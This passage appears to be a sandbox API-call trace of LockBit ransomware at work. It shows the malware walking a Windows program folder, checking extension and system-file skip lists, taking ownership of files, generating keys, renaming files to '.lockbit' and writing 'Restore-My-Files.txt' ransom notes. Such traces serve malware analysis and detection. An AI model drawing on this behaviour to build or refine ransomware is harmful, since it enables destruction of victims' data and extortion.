lstrcmpiW (lpString1="ntldr", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0095.894] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0095.894] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0095.894] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0095.894] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0095.894] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0095.894] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\") returned="" [0095.894] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_ButtonGraphic.png") returned=".png" [0095.894] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0095.894] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0095.894] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0095.895] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0095.895] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0095.895] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0095.895] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0095.895] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0095.895] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0095.895] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0095.895] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0095.895] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0095.895] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0095.895] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0095.895] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0095.895] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0095.895] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0095.895] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0095.895] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0095.895] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0095.895] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0095.896] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0095.896] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0095.896] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0095.896] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0095.896] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0095.896] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0095.896] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0095.896] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_ButtonGraphic.png.lockbit") returned 94 [0095.896] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0095.898] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0095.900] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0095.906] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0095.907] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0095.909] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0095.909] RtlFreeAnsiString (AnsiString="\\") [0095.909] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x334) returned 0x0 [0095.909] malloc (_Size=0x200) returned 0x77d800 [0095.909] NtQueryInformationToken (in: TokenHandle=0x334, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0095.909] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0095.909] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0095.909] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0095.910] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0095.911] CloseHandle (hObject=0x334) returned 1 [0095.911] free (_Block=0x77d800) [0095.911] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x334 [0095.911] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0095.911] malloc (_Size=0x40068) returned 0x3ef0008 [0095.911] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=5088) returned 1 [0095.912] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0095.914] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0095.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0095.914] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0096.117] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0096.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0096.117] ReadFile (in: hFile=0x334, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0096.138] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0096.138] malloc (_Size=0xd2) returned 0x77d800 [0096.138] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xd2, FileInformationClass=0xa) returned 0xc0000008 [0096.138] free (_Block=0x77d800) [0096.138] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette") returned 1 [0096.138] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\Restore-My-Files.txt") returned 74 [0096.138] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0096.138] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f8e3932, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f8e3932, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0096.138] lstrcmpiW (lpString1=".", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0096.138] lstrcmpiW (lpString1="..", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0096.138] PathFindExtensionW (pszPath="NavigationLeft_SelectionSubpicture.png") returned=".png" [0096.138] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0096.138] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0096.139] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0096.139] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0096.139] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0096.139] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0096.139] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0096.139] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0096.139] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0096.139] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0096.139] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0096.139] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0096.139] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0096.139] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0096.139] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0096.139] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0096.139] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0096.139] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0096.139] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0096.139] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0096.139] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0096.139] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0096.139] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0096.139] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0096.139] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0096.139] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0096.139] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0096.139] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0096.139] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0096.139] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0096.139] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0096.140] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0096.140] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0096.140] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0096.140] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0096.140] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0096.140] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0096.140] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0096.140] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0096.140] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0096.140] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0096.140] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0096.140] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0096.140] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0096.140] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0096.140] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0096.140] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0096.140] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0096.140] lstrcmpiW (lpString1="ntldr", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0096.140] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0096.140] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0096.140] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0096.140] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0096.140] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0096.140] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\") returned="" [0096.140] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_SelectionSubpicture.png") returned=".png" [0096.140] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0096.140] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0096.140] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0096.140] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0096.140] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0096.140] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0096.140] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0096.141] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0096.141] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0096.141] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0096.141] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0096.141] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0096.141] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0096.141] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0096.141] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0096.141] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0096.141] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0096.141] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0096.141] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0096.141] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0096.141] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0096.141] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0096.141] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0096.141] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0096.141] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0096.141] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0096.141] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0096.141] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0096.141] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_SelectionSubpicture.png.lockbit") returned 100 [0096.141] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0096.143] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0096.144] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0096.144] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0096.145] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0096.146] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0096.146] RtlFreeAnsiString (AnsiString="\\") [0096.146] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x334) returned 0x0 [0096.146] malloc (_Size=0x200) returned 0x77d800 [0096.146] NtQueryInformationToken (in: TokenHandle=0x334, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0096.146] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0096.146] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0096.146] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0096.147] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0096.147] CloseHandle (hObject=0x334) returned 1 [0096.147] free (_Block=0x77d800) [0096.147] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x334 [0096.147] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0096.147] malloc (_Size=0x40068) returned 0x1ff1e60 [0096.147] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3130) returned 1 [0096.147] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0096.149] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0096.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0096.150] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0096.152] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0096.152] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0096.152] ReadFile (in: hFile=0x334, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0096.154] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0096.154] malloc (_Size=0xde) returned 0x77d800 [0096.154] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xde, FileInformationClass=0xa) returned 0x0 [0096.155] free (_Block=0x77d800) [0096.155] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette") returned 1 [0096.155] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\Restore-My-Files.txt") returned 74 [0096.155] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0096.155] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f909a8f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f909a8f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0096.155] lstrcmpiW (lpString1=".", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0096.155] lstrcmpiW (lpString1="..", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0096.155] PathFindExtensionW (pszPath="NavigationRight_ButtonGraphic.png") returned=".png" [0096.155] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0096.155] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0096.155] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0096.155] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0096.155] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0096.155] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0096.155] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0096.155] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0096.155] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0096.155] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0096.155] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0096.155] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0096.155] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0096.156] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0096.156] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0096.156] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0096.156] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0096.156] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0096.156] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0096.156] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0096.156] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0096.156] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0096.156] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0096.156] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0096.156] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0096.156] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0096.156] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0096.156] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0096.156] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0096.156] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0096.156] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0096.156] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0096.156] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0096.156] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0096.156] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0096.156] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0096.156] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0096.156] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0096.156] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0096.156] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0096.156] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0096.156] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0096.156] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0096.157] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0096.157] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0096.157] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0096.157] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0096.157] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0096.157] lstrcmpiW (lpString1="ntldr", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0096.157] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0096.157] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0096.157] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0096.157] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0096.157] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0096.157] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\") returned="" [0096.157] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_ButtonGraphic.png") returned=".png" [0096.157] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0096.157] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0096.157] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0096.157] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0096.157] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0096.157] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0096.157] lstrcmpiW 